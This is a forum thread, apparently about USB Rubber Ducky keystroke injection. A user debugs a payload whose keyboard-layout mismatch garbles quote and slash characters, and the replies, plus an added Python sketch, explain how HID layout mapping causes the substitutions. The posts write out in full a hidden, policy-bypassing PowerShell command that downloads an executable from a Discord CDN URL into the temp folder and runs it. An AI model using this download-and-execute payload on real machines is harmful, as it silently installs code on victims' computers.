Payload powershell wget execute


Hello, I'm a newb to the USB Rubber Ducky. I received mine 4 days ago for pen testing, and I have a small problem with the STRING code.

Here is the code I used, below.

DELAY 200
CONTROL ESCAPE
DELAY 300
STRING run
DELAY 100
ENTER
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/796873244677242910/calc.exe',\"$env:temp\calc.exe\"); Start-Process \"$env:temp\calc.exe\""
ENTER

 

When executed in notepad.exe, I get this code with a lot of @ and #

 

powershell -NoP -NonI -W Hidden -Exec Bypass @IEX (New-Object System.Net.WebClient).DownloadFile(<https:##cdn.discordapp.com#attachments#777729234181029919#796873244677242910#calc.exe<,@$env:tempbob.exe@); Start-Process @$env:tempbob.exe@@

What am I doing wrong? Can someone help?

 

 

 


I own a Corsair K70 keyboard.

Everything looks good using the ca-fr.json on https://shop.hak5.org/pages/ducky-encoder except one thing: the USB Rubber Ducky does not recognize this key

---> "  
The Ducky replaces it with this key ---> \

powershell -NoP -NonI -W Hidden -Exec Bypass \IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/797350378844848148/calc.exe',\\$env:temp\12345.exe\\); Start-Process \\$env:temp\12345.exe\\\

After the execution, the code is missing a lot of "

The Ducky must click on Shift and this one surrounded in red, but it clicks on Shift + \, the key to the left of the 1 key.

12345.PNG
 

Original code
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/797350378844848148/calc.exe',\"$env:temp\12345.exe\"); Start-Process \"$env:temp\12345.exe\""




 


So, even if something is still not correct, something has changed between your first and last post; @ has become \, what did you change? Forward slashes / also seem to have been changed to now be correct (was previously the # char in the first post), also < seems to be correct as it's ' in the latest example of your output.

Also not sure what keyboard layout you have in the screenshot of your On-Screen Keyboard. I configured one of my Windows 10 boxes for Canadian French and Canadian-French (Legacy) and none of them showed the mapping you have captured in your screenshot. Your physical keyboard doesn't matter, btw. I used the chars that give you problems with other keyboard layouts and I have no problems running my payloads that contain those chars. Perhaps the ca-fr.json language map file isn't all correct?
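The substitutions reported in the first post (" typed as @, / as #, ' as <) are what a layout mismatch produces: a HID keyboard sends key positions plus modifiers, and the host turns them into characters using its own active layout. The sketch below is an added example, not part of the thread or of Hak5's encoder; the partial Canadian French and US tables and the sample string are assumptions constructed for illustration, not taken from ca-fr.json.

```python
import string

SHIFT = 0x02  # Left Shift bit in the HID modifier byte


def letters():
    # a-z sit on the same keys (usage IDs 0x04-0x1D) in both QWERTY layouts
    return {c: (0, 0x04 + i) for i, c in enumerate(string.ascii_lowercase)}


# Partial char -> (modifier, HID usage ID) tables (assumed; only the symbols discussed)
US = {**letters(),
      '"': (SHIFT, 0x34), "'": (0, 0x34), '/': (0, 0x38),
      '@': (SHIFT, 0x1F), '#': (SHIFT, 0x20), '<': (SHIFT, 0x36)}
CA_FR = {**letters(),
         '"': (SHIFT, 0x1F),   # Shift + the key labelled 2
         '/': (SHIFT, 0x20),   # Shift + the key labelled 3
         "'": (SHIFT, 0x36)}   # Shift + the comma key


def encode(text, layout):
    """What the injecting device sends: one (modifier, usage ID) report per char."""
    return [layout[ch] for ch in text]


def decode(reports, layout):
    """What the host types: the same reports read through the host's layout."""
    reverse = {report: ch for ch, report in layout.items()}
    return "".join(reverse.get(r, "?") for r in reports)


def substitutions(intended, observed):
    """Distinct (intended, observed) character pairs that differ."""
    return sorted({(a, b) for a, b in zip(intended, observed) if a != b})


SAMPLE = "\"a/b'c\""  # constructed test string containing the three problem characters

if __name__ == "__main__":
    typed = decode(encode(SAMPLE, CA_FR), US)
    print("intended:", SAMPLE)
    print("typed   :", typed)
    for want, got in substitutions(SAMPLE, typed):
        print(f"  {want!r} came out as {got!r}")
```

When the encoder's layout and the host's active input language agree, the same string round-trips unchanged, which is why the host's layout setting, not the physical keyboard, decides the result.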
